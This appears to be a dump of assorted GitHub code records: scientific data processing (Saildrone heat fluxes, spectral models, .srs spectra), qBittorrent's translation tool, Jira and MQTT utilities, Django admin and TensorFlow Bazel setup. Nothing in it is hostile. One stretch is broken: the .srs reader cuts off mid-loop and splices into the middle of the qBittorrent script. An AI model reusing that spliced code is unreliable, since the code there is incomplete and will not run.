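# Note (a sketch): with pymoos' asynchronous comms, the mail callback above is\n# invoked from the client's background thread; fetch() drains the queued messages,\n# so main() below only needs to keep the process alive.\n\ndef 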
main():\n prntr = printerMOOS('localhost', 9000)\n\n while True:\n time.sleep(1)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"moos-tutorials/python-moos-tutorials","sub_path":"04-speech-recognition/printer.py","file_name":"printer.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"} +{"seq_id":"31534340420","text":"from SphericalHarmonics import SphericalHarmonics, read_code\nimport numpy as np\nfrom timeit import default_timer as timer\n\nresolution=400\ncolorMap = 8\ncode = 0\n\nt = timer()\ncoords = SphericalHarmonics(resolution, colorMap, code) # res, colorMap index, code\nprint('lap:', timer()-t)\n\nnpcoords = np.array(coords)\nprint('coords:', npcoords[0][:10], '\\nnormals:', npcoords[1][:10], '\\ncolors:', npcoords[2][:10], '\\ntextures:', npcoords[3][:10])\n\nnew_coords = read_code(code)\nprint(np.all(npcoords==np.array(new_coords)))\nexit(1)\n","repo_name":"rforcen/SphericalHarmonicsMetalPython","sub_path":"SphericalHarmonicsMetal/testSH.py","file_name":"testSH.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"24064344920","text":"#import os\n#import glob\nfrom pathlib import Path\nimport numpy as np\nimport logging\nimport sys\nlogging.basicConfig(\n level=logging.INFO,\n format=\"%(asctime)s [%(levelname)s] %(message)s\",\n handlers=[\n #logging.FileHandler(\"Logging.log\"),\n logging.StreamHandler(sys.stdout)\n ])\n\n# def getFileList(Settings):\n# Settings['parent_directory']=Path(__file__).parent \n# if Settings['filename'] == '':\n# Settings['filelist']=glob.glob(str(Path(Settings['parent_directory'],'*.srs'))) \n# else: \n# Settings['filelist']=Settings['filename']\n# return Settings\n\nclass srsFile:\n def __init__(self,filename):\n self.Filename=Path(filename)\n self.Data={}\n self.Spec_Pts = np.fromfile(self.Filename, dtype=np.int32 , count=1, offset=14036)[0]\n self.Max_Wn = np.fromfile(self.Filename, dtype=np.single , count=1, offset=14048)[0]\n self.Min_Wn = np.fromfile(self.Filename, dtype=np.single , count=1, offset=14052)[0]\n info_raw=np.fromfile(self.Filename, dtype='S1',count=318, offset=15232)\n self.info=''\n for b in info_raw:\n self.info=self.info+b.decode('ascii')\n del b \n \n\n def getData(self,No_Avg=200,Header_Size=25,Footer_Size=25,Start_of_Data=49232,Percent=False,M_No=500):\n# Start_of_Data=49232 #4226*4 #original Value from Matlab script: 16904\n# Default Values must be adjusted to current experiment!\n \n f=Path(self.Filename)\n logging.info(f'Get Data from {f}.') \n \n Wn=np.linspace(self.Min_Wn, self.Max_Wn, num=self.Spec_Pts)\n spectra=[]\n time=[]\n\n bg=np.fromfile(f, dtype=np.single , count=self.Spec_Pts, offset= 16904 + 4*(Header_Size))\n \n i=0\n \n s=np.fromfile(f, dtype=np.single , count=self.Spec_Pts, offset= Start_of_Data+4*(Header_Size))\n scr=np.fromfile(f, dtype=np.uint, count=2, offset= Start_of_Data)\n s_count=1\n \n while scr.shape[0]>1 and scr[0]==No_Avg and i\\n'\n b'\\n')\n tree.write(file, encoding = 'utf-8')\n except Exception:\n print('\\tFailed to write %s!' 
% (os.path.normpath(filename)))\n\nargp = argparse.ArgumentParser(\n prog = 'tstool.py', description = 'Update qBittorrent WebUI translation files.')\nargp.add_argument('--no-obsolete', dest = 'no_obsolete', action = 'store_true',\n default = no_obsolete,\n help = 'remove obsolete messages (default: mark them as obsolete)')\nargp.add_argument('--www-folder', dest = 'www_folder', action = 'store',\n default = www_folder,\n help = 'folder with WebUI source files (default: \"%s\")' % (www_folder))\nargp.add_argument('--ts-folder', dest = 'ts_folder', action = 'store',\n default = ts_folder,\n help = 'folder with WebUI translation files (default: \"%s\")' % (ts_folder))\n\nargs = argp.parse_args()\nno_obsolete = args.no_obsolete\nwww_folder = args.www_folder\nts_folder = args.ts_folder\n\nprint(\"Processing source files...\")\nnfiles = 0\nsource_ts = {}\nfor root, dirs, files in os.walk(www_folder):\n for file in files:\n if os.path.splitext(file)[-1] in accepted_exts:\n parseSource(os.path.join(root, file), source_ts)\n nfiles += 1\n\nif nfiles == 0:\n print(\"No source files found!\")\n sys.exit()\n\nnstrings = sum(len(sublist) for sublist in source_ts.values())\nprint(\"Found %d strings within %d contexts.\" % (nstrings, len(source_ts)))\nprint(\"\")\n\nprint(\"Processing translation files...\")\nfor entry in os.scandir(ts_folder):\n if (entry.is_file() and entry.name.startswith('webui_')\n and entry.name.endswith(\".ts\")):\n processTranslation(entry.path, copy.deepcopy(source_ts))\n\nprint(\"Done!\")\n","repo_name":"qbittorrent/qBittorrent","sub_path":"src/webui/www/tstool.py","file_name":"tstool.py","file_ext":"py","file_size_in_byte":5461,"program_lang":"python","lang":"en","doc_type":"code","stars":22861,"dataset":"github-code","pt":"18"} +{"seq_id":"26050025001","text":"def func(a, b):\n flag = 0\n for i in a:\n for j in b:\n if i == j:\n flag = 1\n print(f\"{i} is common\")\n break\n if flag == 0:\n print(\"Nothing is common\")\n\n\na = [1, 2, 3, 4, 5]\nb = [5, 6, 7, 8, 9]\n\nc = [1, 2, 3, 4, 5]\nd = [6, 7, 8, 9]\n\ne = [1, 2, 3, 4, 50, 9]\n\nfunc(b, e)\n\n\n# 2. Converting to sets is another solution, because the intersection operator (&)\n# yields the values common to both sets.\ndef has_common_elements(a, b):\n first = set(a)\n second = set(b)\n\n if first & second:\n return True\n else:\n return False\n\n\nprint(has_common_elements(c, d))\n\n\n# 3. Using sets and the intersection() method.\ndef has_common_elements1(a, b):\n first = set(a)\n second = set(b)\n\n return len(first.intersection(second)) > 0\n\n\nprint(has_common_elements1(a, b))\n
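\n# Quick check (a sketch): both set-based helpers behave consistently, e.g.\n# has_common_elements([1, 2], [2, 3]) -> True and has_common_elements1(c, d) -> False.\n\n\n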
","repo_name":"Sudipta0102/PyBasic","sub_path":"02.DataTypes/Exercise/ListEx/05.CheckTwoListsHaveAt-leastOneElementCommon.py","file_name":"05.CheckTwoListsHaveAt-leastOneElementCommon.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"1320838770","text":"# coding: utf-8\nfrom typing import List\nfrom typing import Union\n\nfrom jira_redmine.base.resources.project import Project\nfrom jira_redmine.jira.converter import Converter\nfrom jira_redmine.jira.managers.base import BaseJiraManager\n\n\nclass ProjectManager(BaseJiraManager):\n \"\"\"Access manager for Jira projects.\"\"\"\n\n def get_all(self) -> List[Project]:\n \"\"\"Get all projects.\"\"\"\n projects = self._client.projects()\n return [Converter.get_project(project) for project in projects]\n\n def get(self, project_id: Union[int, str]) -> Project:\n \"\"\"Get a project by its identifier.\"\"\"\n project = self._get_or_raise('project', project_id, Project)\n return Converter.get_project(project)\n\n def create(self, project: Project) -> Project:\n \"\"\"Create a new project.\"\"\"\n jira_project = self._client.create_project(\n key=project.key,\n name=project.name,\n description=project.description,\n assignee=project.creator.key,\n )\n return self.get(jira_project.key)\n","repo_name":"vm85/jira_redmine","sub_path":"src/jira_redmine/jira/managers/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"29186298518","text":"#!/usr/bin/env python\n\nimport json\nimport paho.mqtt.client as paho\nimport ssl\nimport sys\nfrom os import path\n\nclass Ding():\n mqtt = None\n\n def __init__(self, mqtt=None):\n self.mqtt_config = mqtt or self.load_config()['mqtt']\n self.mqtt = paho.Client()\n\n def load_config(self=None, config_file_name=\"~/.ding.conf\"):\n config = {}\n config_file_path = path.expanduser(config_file_name)\n with open(config_file_path) as config_file:\n config = json.load(config_file)\n return config\n\n def connect(self):\n self.mqtt.username_pw_set(self.mqtt_config['username'], self.mqtt_config['password'])\n if 'ca_certs' in self.mqtt_config:\n self.mqtt.tls_set(self.mqtt_config['ca_certs'], tls_version=ssl.PROTOCOL_TLSv1_2)\n self.mqtt.connect(self.mqtt_config['host'], self.mqtt_config['port'])\n\n def ding(self, message=None):\n topic = self.mqtt_config['topic']\n if not message:\n message = \"ding\"\n topic += '/' + message\n self.mqtt.publish(topic)\n\n def loop_forever(self):\n self.mqtt.loop_forever()\n\n def disconnect(self):\n self.mqtt.disconnect()\n\ndef main():\n ding = None\n if len(sys.argv) > 2:\n print(\"usage: %s [keyword]\" % sys.argv[0])\n sys.exit(1)\n\n ding = Ding()\n ding.connect()\n\n message = None\n if len(sys.argv) > 1:\n message = sys.argv[1]\n ding.ding(message)\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"xxv/ding","sub_path":"ding.py","file_name":"ding.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"73270993319","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport time\nimport astropy.io.fits as fits\nimport os.path\n\n#if 
os.path.exists(\"/bc03/Miles_Atlas/Kroupa_IMF/\"):\n# path = os.path.dirname(os.path.realpath(__file__))\npath = \"bc03/Miles_Atlas/Kroupa_IMF/\"\ngen_file = str(path) + \"bc2003_hr_xmiless_m62_kroup_ssp.ised_ASCII\"\n\n\nage_bc03 = np.loadtxt(gen_file, max_rows = 1, dtype=float)\n\nages = np.array(age_bc03[1:222])\n\n\nlambda_bc03 = np.genfromtxt(gen_file, skip_header=6, skip_footer=233, dtype=float)\nlambda_ = np.array(lambda_bc03)\n\nwavelengths = lambda_[1:]\n\ndef spectrum():\n models = [\"m22\",\"m32\", \"m42\",\"m52\", \"m62\", \"m72\", \"m82\"]\n\n flux_grid =[]\n\n for Z in models:\n\n file = str(path)+\"bc2003_hr_xmiless_\"+str(Z)+\"_kroup_ssp.ised_ASCII\"\n\n flux_models = np.genfromtxt(file, skip_header=7, skip_footer=12, dtype=float)\n\n\n flux_grid.append(flux_models[:,1:13217])\n\n #print(flux_grid.shape)\n\n return ages, wavelengths, flux_grid\n\n#new_wavs = np.arange(1000., 70000., 10.)\n#new_fluxes = spectres.spectres(new_wavs, lambda_[1:], fluxes)\n\n\n\n#print(len(flux_grid))\n#import pickle\n\n#arr = {'ages': ages, 'wavelengths': wavelengths, 'fluxes':flux_grid}\n\n#print(arr)\n#pickle.dump( arr, open( \"awf_spec.p\", \"wb\" ))\n\n#file = pickle.load( open( \"awf_spec.p\", \"rb\" ) )\n#ages, waves,flux_grid = spectrum()\n#ages = np.array(ages)\n#print(file['fluxes'])\n#models = flux_grid\n\n#print(models[0:5])\n\n#fits.writeto(\"awf_spec.p\", arr)\n","repo_name":"MLHamadouche/sed_fitting_code","sub_path":"spec_fluxes.py","file_name":"spec_fluxes.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"3782441723","text":"from langchain.chains.summarize import load_summarize_chain\nfrom langchain.chains import LLMChain\nfrom langchain_custom.staff_report import summarize_prompt, style_trans_prompt\n\nfrom langchain_custom.staff_report.llm import GLM\nfrom utils.text_loader import txt_loader, str_loader\n\n\nmodel_path = \"C:\\\\Users\\\\59700\\\\Documents\\\\_Personals_local\\\\models\\\\chatglm2-6b\"\nllm = GLM()\nllm.load_model(model_path=model_path)\n\n\ndocs = txt_loader(\"./docs/1.txt\", chunk_size=500)\ndocs = str_loader(\"12\", chunk_size=500)\n\n\nchain_summ = load_summarize_chain(\n llm, \n chain_type=\"map_reduce\", \n return_intermediate_steps=True, \n map_prompt=summarize_prompt.PROMPT,\n combine_prompt=summarize_prompt.PROMPT,\n)\n\nchain_styletrans = LLMChain(llm=llm, prompt=style_trans_prompt.PROMPT)\n\nsumm = chain_summ({\"input_documents\": docs}, return_only_outputs=True)\noutput = chain_styletrans.run(text=summ['output_text'])\n\n\nchain_summ_single = LLMChain(llm=llm, prompt=summarize_prompt.PROMPT)\nfrom tqdm import tqdm\nsummary_paragraphs = ''\nfor doc in tqdm(docs):\n summary_paragraphs += chain_summ_single.run(doc)\n \nchain_summ_single.run(summary_paragraphs)","repo_name":"wheresmyhair/prompt-app-dev","sub_path":"__deprecated/temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"19082198700","text":"from django.db import models\n\nfrom accounts.models import CustomUser\n\nDEFAULT_SETTINGS = {\n \"currency\": \"USD\",\n \"language\": \"EN\"\n}\n\nCURRENCY_CHOICE = (\n (\"UAH\", \"₴\"),\n (\"USD\", \"$\"),\n (\"EUR\", \"€\")\n)\n\nLANGUAGE_CHOICE = (\n (\"EN\", \"English\"),\n (\"UA\", \"Ukrainian\")\n)\n\n\nclass Config(models.Model):\n \"\"\" Represents user's preferences. 
\"\"\"\n \n user = models.OneToOneField(CustomUser, related_name=\"config\", on_delete=models.CASCADE)\n currency = models.CharField(max_length=3, choices=CURRENCY_CHOICE, default=DEFAULT_SETTINGS[\"currency\"])\n language = models.CharField(max_length=56, choices=LANGUAGE_CHOICE, default=DEFAULT_SETTINGS[\"language\"])\n\n class Meta:\n verbose_name = \"config\"\n verbose_name_plural = \"configs\"\n\n def __str__(self):\n return f\"User[{self.user.profile.username}] | Config\"\n","repo_name":"antony-kosenko/moneyroam","sub_path":"preferences/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"4102314837","text":"import sys\nsys.stdin = open('1520.txt')\nimport collections\n\n# left, right, up, down\ndr = [0, 0, -1, 1]\ndc = [-1, 1, 0, 0]\n\n\ndef bfs():\n global cnt \n\n deq = collections.deque()\n deq.append((0, 0))\n \n while deq:\n row, col = deq.popleft()\n for w in range(4):\n if possible_map[row][col][w] == False:\n continue\n\n nr = row + dr[w]\n nc = col + dc[w]\n\n # if nr < 0 or nr >= N or nc < 0 or nc >= M:\n # continue\n\n if (nr, nc) == (N - 1, M - 1):\n cnt += 1\n \n deq.append((nr, nc))\n\n \nN, M = map(int, input().split())\nmap_list = [list(map(int, input().split())) for _ in range(N)]\n\npossible_map = [[[0, 0, 0, 0] for _ in range(M)] for _ in range(N)]\n\nfor row in range(N):\n for col in range(M):\n\n temp = map_list[row][col]\n for w in range(4):\n nr = row + dr[w]\n nc = col + dc[w]\n if 0 <= nr < N and 0 <= nc < M:\n if map_list[nr][nc] < temp:\n possible_map[row][col][w] = True\n continue\n \n possible_map[row][col][w] = False\n\ncnt = 0\nbfs()\nprint(cnt)
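\n# Note (a sketch): possible_map precomputes, for every cell, which of the four\n# moves goes strictly downhill, so bfs() only ever follows decreasing heights.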
","repo_name":"HwnagYoungJun/algorithm","sub_path":"2020/7월/0713/1520_내리막길_백준.py","file_name":"1520_내리막길_백준.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"73467797160","text":"############################ READ ME ######################\n#This code was written by Hanna Rosenthal to process Saildrone data from Sd1020, Sd1022, Sd1023 during the Circumnavigation of Antarctica in 2019\n# TEST \n# five main steps are done in this script: \n# 1. data is projected onto a continuous time vector (in the \"raw\" dataset provided by Sd Inc. the time vector was not continuous)\n# 2. mask with nan all rows (times) where measurements required for the heat flux calculation are missing\n# 3. 5 min rolling mean for all variables to reduce bias from sudden platform motion \n# 4. salinity despiked (threshold 0.1 PSU)\n# 5. sensible and latent bulk heat fluxes are calculated\n#\n# the results are saved as csv files \n# the following variables are saved 'latitude', 'longitude', 'pressure', 'airtemp', 'humidity', 'uwind', 'vwind', 'sst', 'salinity', 'wind', 'Q_sens', 'Q_lat', 'sensor_p',\n# 'density', 'dist_cov' (distance between measurements), 'dist_NZ' (track distance), 'alpha', 'beta', 'R', 'density_grad']\n\n\n####import packages \nimport pandas as pd\nimport SD_Project as SD\nimport numpy as np\nimport gsw\nimport seawater as sw\nimport xarray as xr\nimport datetime\n\nimport matplotlib.pyplot as plt\nfrom pandas.plotting import register_matplotlib_converters\nregister_matplotlib_converters()\nprint('loaded packages')\n\n#data cleaning\n## load data in\n# import key variables from data sets \nnames_20=['latitude', 'longitude', 'BARO_PRES_MEAN', 'TEMP_AIR_MEAN', 'RH_MEAN', 'UWND_MEAN', 'VWND_MEAN', 'TEMP_CTD_MEAN', 'SAL_MEAN'] #variable names in Sd data set provided by SD Inc.\nnames_22=['latitude', 'longitude', 'BARO_PRES_MEAN', 'TEMP_AIR_MEAN', 'RH_MEAN', 'UWND_MEAN', 'VWND_MEAN', 'TEMP_CTD_RBR_MEAN', 'SAL_RBR_MEAN'] # variable names were different for Sd1022/23 than Sd1020\nnames_new=['latitude', 'longitude', 'pressure', 'airtemp', 'humidity', 'uwind', 'vwind', 'sst', 'salinity'] #new easier names\n\n\nfilepath_20= 'data/Sd1020_data.nc'\nDS_20= xr.open_dataset(filepath_20)\nDS_20= DS_20.rename(dict(zip(names_20, names_new)))[names_new].squeeze('trajectory') #rename the variables to easier names and get rid of the trajectory dimension\n\nfilepath_22='data/Sd1022_data_merged.nc'\nDS_22= xr.open_dataset(filepath_22)\nDS_22= DS_22.rename(dict(zip(names_22, names_new)))[names_new]\n\nfilepath_23='data/Sd1023_data_merged.nc'\nDS_23= xr.open_dataset(filepath_23)\nDS_23= DS_23.rename(dict(zip(names_22, names_new)))[names_new]\n\nprint('uploaded data')\n\n# make time a coordinate and drop trajectory (except for 1020, where it is dropped later) in each dataset\n# explanation: the time vectors provided in the Sd datasets were not continuous; this might differ in other SD datasets\nt_20 = DS_20['time'].values\ndf_20 = DS_20.to_dataframe()\ndf_20.index = t_20\ndf_20.index.names=['time']\ndf_20 = df_20.drop(columns=['time'])\n\ndf_22 = DS_22.to_dataframe().drop(columns=['trajectory'])\ndf_23 = DS_23.to_dataframe().drop(columns=['trajectory'])\n\ndef make_cont_timevector(df_index):\n '''df_index: dataframe index [datetime64[ns]], df.index \n output: continuous time vector with the same start and end date as the dataframe '''\n import numpy as np\n td_full= (df_index[-1]- df_index[0])\n t_min= td_full.days*24*60\n td_rest= (df_index[-1]-np.timedelta64(td_full.days, 'D'))-df_index[0]\n t_min= t_min + td_rest.seconds//60\n \n date = np.array(df_index[0], dtype=np.datetime64)\n vec= date + pd.to_timedelta(np.arange(t_min+1), 'm')\n return vec\n\n# make continuous time vectors for all three datasets, reproject onto this vector, fill with nans \ndf_cont={}\ndf= {'1020':df_20, '1022':df_22, '1023':df_23}\nfor frame in df:\n t_new= make_cont_timevector(df[frame].index)\n df_new= pd.DataFrame(index=t_new)\n df_new.index.names=['time']\n for var in df[frame].columns: \n df_new[var] = pd.Series(df[frame][var], index=df[frame].index)\n df[frame]=df_new\n\n# drop trajectory column for 1020 \ndf['1020'] = df['1020'].drop(columns=['trajectory'])\n\nprint('fixed time vectors')\n
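# For example (a sketch): an index running from 2019-01-01 00:00 to 2019-01-01 00:02\n# makes make_cont_timevector return three minute-spaced timestamps, one per minute\n# of the record, onto which the measurements are then reprojected.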
###calculate 5 min rolling mean of measurements \nfor d in df:\n df[d]['wind'] = SD.wind_to_ref_height(SD.wind(df[d]['uwind'],df[d]['vwind']), 3.6, 10) # correct wind speed to the reference height of 10 m (the wind sensor height is needed here)\n df[d]['wind'] = df[d]['wind'].rolling(5, center=True).mean()\n df[d]['airtemp'] = df[d]['airtemp'].rolling(5, center=True).mean()\n df[d]['sst'] = df[d]['sst'].rolling(5, center=True).mean()\n df[d]['humidity'] = df[d]['humidity'].rolling(5, center=True).mean()\n df[d]['salinity'] = df[d]['salinity'].rolling(5, center=True).mean()\n df[d]['pressure'] = df[d]['pressure'].rolling(5, center=True).mean()\n \n df[d]['Q_sens'] = SD.Q_sensible(df[d]['wind'], df[d]['airtemp'], df[d]['sst']) #sensible bulk heat flux\n df[d]['Q_lat'] = -SD.Q_latent(df[d]['wind'], SD.humidity_spec_sat3(df[d]['humidity'], df[d]['airtemp'], df[d]['pressure']), SD.humidity_specific3(df[d]['humidity'], df[d]['airtemp'], df[d]['pressure'])) # latent bulk heat flux\n df[d]['salinity']= SD.despike_sal(df[d]['salinity'], 0.1) # remove salinity spikes larger than 0.1 PSU \n \n# mask the complete row (corresponding to one time) if any sensor measurement is nan \n# explanation: there were missing lon/lat values and intermittent gaps in the measurements, \n# so rows are masked as a whole before derived quantities are calculated \nfor d in df: \n mask= np.ones(df[d].shape[0])\n for i in df[d].columns:\n mask= np.zeros(df[d].shape[0])*df[d][i]+mask\n\n for i in df[d].columns:\n df[d][i]=df[d][i]*mask\n \n# calculate variables from measurements \nfor d in df:\n df[d]['sensor_p']= np.zeros(df[d]['wind'].shape[0]) # create sensor depth vector\n df[d]['sensor_p'][:]= 0.5 #sensor depth\n df[d]['density']= gsw.rho(gsw.SA_from_SP(df[d]['salinity'], df[d]['sensor_p'], df[d]['longitude'], df[d]['latitude']), gsw.CT_from_t(df[d]['salinity'], df[d]['sst'], df[d]['sensor_p']), df[d]['sensor_p'])\n #df[d]['dist_covered']= np.zeros(len(df[d]['latitude']))\n df[d]['dist_cov'] = pd.Series(sw.dist(df[d]['latitude'], df[d]['longitude'], units='km')[0],index=df[d].index[1:]) # distance covered between measurements \n df[d]['dist_cov'] = df[d]['dist_cov'].replace(0.0, np.nan)\n df[d]['dist_NZ'] = df[d]['dist_cov'].cumsum() #calculate track distance \n df[d]['dist_cov'] = df[d]['dist_cov'].where(df[d]['dist_cov']>0.015)\n df[d]['sensor_p']=np.zeros((df[d]['wind'].shape[0]))# \n df[d]['sensor_p'][:]=0.5 #sensor depth\n df[d]['alpha'] = gsw.alpha(gsw.SA_from_SP(df[d]['salinity'], df[d]['sensor_p'], df[d]['longitude'], df[d]['latitude']), gsw.CT_from_t(df[d]['salinity'], df[d]['sst'], df[d]['sensor_p']), df[d]['sensor_p'])\n df[d]['beta']= gsw.beta(gsw.SA_from_SP(df[d]['salinity'], df[d]['sensor_p'], df[d]['longitude'], df[d]['latitude']), gsw.CT_from_t(df[d]['salinity'], df[d]['sst'], df[d]['sensor_p']), df[d]['sensor_p'])\n\n R=np.abs((df[d]['alpha'][:-1]*np.diff(df[d]['sst']))/(df[d]['beta'][:-1]*np.diff(df[d]['salinity'])))\n df[d]['R'] = pd.Series(R, index=df[d].index[1:])\n \n df[d]['density_grad'] = (np.abs(np.diff(df[d]['density'])))/(df[d]['dist_cov'][1:])\nprint('calculated variables, 5 min rolling mean')\n\n#save data as csv\ndf['1020'].to_csv('df1020.csv')\ndf['1022'].to_csv('df1022.csv')\ndf['1023'].to_csv('df1023.csv')\n\n\nprint('csv files saved')","repo_name":"HSR-36/Rosenthal_et_al2023","sub_path":"processing_SD_data.py","file_name":"processing_SD_data.py","file_ext":"py","file_size_in_byte":7351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"15662915490","text":"from django.contrib import admin\nfrom .models import * \n\n# Register your models here.\n\nclass PersonShowInline(admin.StackedInline):\n\tmodel = PersonShow \n\textra 
= 0 \n\nclass ContactDetailsInline(admin.StackedInline):\n\tmodel = ContactDetail \n\textra = 0\n\n\tfields = (\n\t\t'contact_reference',\n\t\t('email_primary', 'email_secondary'),\n\t\t('mobile_number', 'phone_number'),\n\t\t('post_point', 'building_name', 'building_number'),\n\t\t'street_name',\n\t\t('city', 'region'),\n\t\t('country', 'post_code')\n\t)\n\nclass PersonAdmin(admin.ModelAdmin):\n\tfields = (\n\t\t('site_user', 'person_type'),\n\t\t('forename', 'middle_name', 'surname'),\n\t\t'pronouns',\n\t\t'photo',\n\t\t('medical_info', 'allergies')\n\t)\n\tinlines = [ ContactDetailsInline, PersonShowInline ]\n\n\nadmin.site.register(Person, PersonAdmin)\nadmin.site.register(Allergy)","repo_name":"samozzy/pgp_mis","sub_path":"people/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"4014053314","text":"\"\"\"TensorFlow workspace initialization. Consult the WORKSPACE on how to use it.\"\"\"\n\n# Import third party config rules.\nload(\"@bazel_skylib//:workspace.bzl\", \"bazel_skylib_workspace\")\nload(\"@bazel_skylib//lib:versions.bzl\", \"versions\")\nload(\"//third_party/gpus:cuda_configure.bzl\", \"cuda_configure\")\nload(\"//third_party/gpus:rocm_configure.bzl\", \"rocm_configure\")\nload(\"//third_party/tensorrt:tensorrt_configure.bzl\", \"tensorrt_configure\")\nload(\"//third_party/nccl:nccl_configure.bzl\", \"nccl_configure\")\nload(\"//third_party/git:git_configure.bzl\", \"git_configure\")\nload(\"//third_party/py:python_configure.bzl\", \"python_configure\")\nload(\"//third_party/systemlibs:syslibs_configure.bzl\", \"syslibs_configure\")\nload(\"//tensorflow/tools/toolchains:cpus/aarch64/aarch64_compiler_configure.bzl\", \"aarch64_compiler_configure\")\nload(\"//tensorflow/tools/toolchains:cpus/arm/arm_compiler_configure.bzl\", \"arm_compiler_configure\")\nload(\"//tensorflow/tools/toolchains/embedded/arm-linux:arm_linux_toolchain_configure.bzl\", \"arm_linux_toolchain_configure\")\nload(\"//third_party:repo.bzl\", \"tf_http_archive\", \"tf_mirror_urls\")\nload(\"//third_party/clang_toolchain:cc_configure_clang.bzl\", \"cc_download_clang_toolchain\")\nload(\"//tensorflow/tools/def_file_filter:def_file_filter_configure.bzl\", \"def_file_filter_configure\")\nload(\"//third_party/llvm:setup.bzl\", \"llvm_setup\")\n\n# Import third party repository rules. 
See go/tfbr-thirdparty.\nload(\"//third_party/FP16:workspace.bzl\", FP16 = \"repo\")\nload(\"//third_party/absl:workspace.bzl\", absl = \"repo\")\nload(\"//third_party/benchmark:workspace.bzl\", benchmark = \"repo\")\nload(\"//third_party/dlpack:workspace.bzl\", dlpack = \"repo\")\nload(\"//third_party/ducc:workspace.bzl\", ducc = \"repo\")\nload(\"//third_party/eigen3:workspace.bzl\", eigen3 = \"repo\")\nload(\"//third_party/farmhash:workspace.bzl\", farmhash = \"repo\")\nload(\"//third_party/flatbuffers:workspace.bzl\", flatbuffers = \"repo\")\nload(\"//third_party/gemmlowp:workspace.bzl\", gemmlowp = \"repo\")\nload(\"//third_party/hexagon:workspace.bzl\", hexagon_nn = \"repo\")\nload(\"//third_party/highwayhash:workspace.bzl\", highwayhash = \"repo\")\nload(\"//third_party/hwloc:workspace.bzl\", hwloc = \"repo\")\nload(\"//third_party/implib_so:workspace.bzl\", implib_so = \"repo\")\nload(\"//third_party/icu:workspace.bzl\", icu = \"repo\")\nload(\"//third_party/jpeg:workspace.bzl\", jpeg = \"repo\")\nload(\"//third_party/libprotobuf_mutator:workspace.bzl\", libprotobuf_mutator = \"repo\")\nload(\"//third_party/nasm:workspace.bzl\", nasm = \"repo\")\nload(\"//third_party/py/ml_dtypes:workspace.bzl\", ml_dtypes = \"repo\")\nload(\"//third_party/pybind11_abseil:workspace.bzl\", pybind11_abseil = \"repo\")\nload(\"//third_party/pybind11_bazel:workspace.bzl\", pybind11_bazel = \"repo\")\nload(\"//third_party/opencl_headers:workspace.bzl\", opencl_headers = \"repo\")\nload(\"//third_party/kissfft:workspace.bzl\", kissfft = \"repo\")\nload(\"//third_party/pasta:workspace.bzl\", pasta = \"repo\")\nload(\"//third_party/ruy:workspace.bzl\", ruy = \"repo\")\nload(\"//third_party/sobol_data:workspace.bzl\", sobol_data = \"repo\")\nload(\"//third_party/stablehlo:workspace.bzl\", stablehlo = \"repo\")\nload(\"//third_party/vulkan_headers:workspace.bzl\", vulkan_headers = \"repo\")\nload(\"//third_party/tensorrt:workspace.bzl\", tensorrt = \"repo\")\nload(\"//third_party/triton:workspace.bzl\", triton = \"repo\")\n\n# Import external repository rules.\nload(\"@bazel_tools//tools/build_defs/repo:java.bzl\", \"java_import_external\")\nload(\"@tf_runtime//:dependencies.bzl\", \"tfrt_dependencies\")\nload(\"//tensorflow/tools/toolchains/remote_config:configs.bzl\", \"initialize_rbe_configs\")\nload(\"//tensorflow/tools/toolchains/remote:configure.bzl\", \"remote_execution_configure\")\nload(\"//tensorflow/tools/toolchains/clang6:repo.bzl\", \"clang6_configure\")\nload(\"@rules_jvm_external//:defs.bzl\", \"maven_install\")\n\ndef _initialize_third_party():\n \"\"\" Load third party repositories. See above load() statements. 
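Each function call below instantiates one external repository defined in its per-dependency workspace.bzl file. 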
\"\"\"\n FP16()\n absl()\n bazel_skylib_workspace()\n benchmark()\n ducc()\n dlpack()\n eigen3()\n farmhash()\n flatbuffers()\n gemmlowp()\n hexagon_nn()\n highwayhash()\n hwloc()\n icu()\n implib_so()\n jpeg()\n kissfft()\n libprotobuf_mutator()\n ml_dtypes()\n nasm()\n opencl_headers()\n pasta()\n pybind11_abseil()\n pybind11_bazel()\n ruy()\n sobol_data()\n stablehlo()\n vulkan_headers()\n tensorrt()\n triton()\n\n # copybara: tsl vendor\n\n# Toolchains & platforms required by TensorFlow to build.\ndef _tf_toolchains():\n native.register_execution_platforms(\"@local_execution_config_platform//:platform\")\n native.register_toolchains(\"@local_execution_config_python//:py_toolchain\")\n\n # Loads all external repos to configure RBE builds.\n initialize_rbe_configs()\n\n # Note that we check the minimum bazel version in WORKSPACE.\n clang6_configure(name = \"local_config_clang6\")\n cc_download_clang_toolchain(name = \"local_config_download_clang\")\n cuda_configure(name = \"local_config_cuda\")\n tensorrt_configure(name = \"local_config_tensorrt\")\n nccl_configure(name = \"local_config_nccl\")\n git_configure(name = \"local_config_git\")\n syslibs_configure(name = \"local_config_syslibs\")\n python_configure(name = 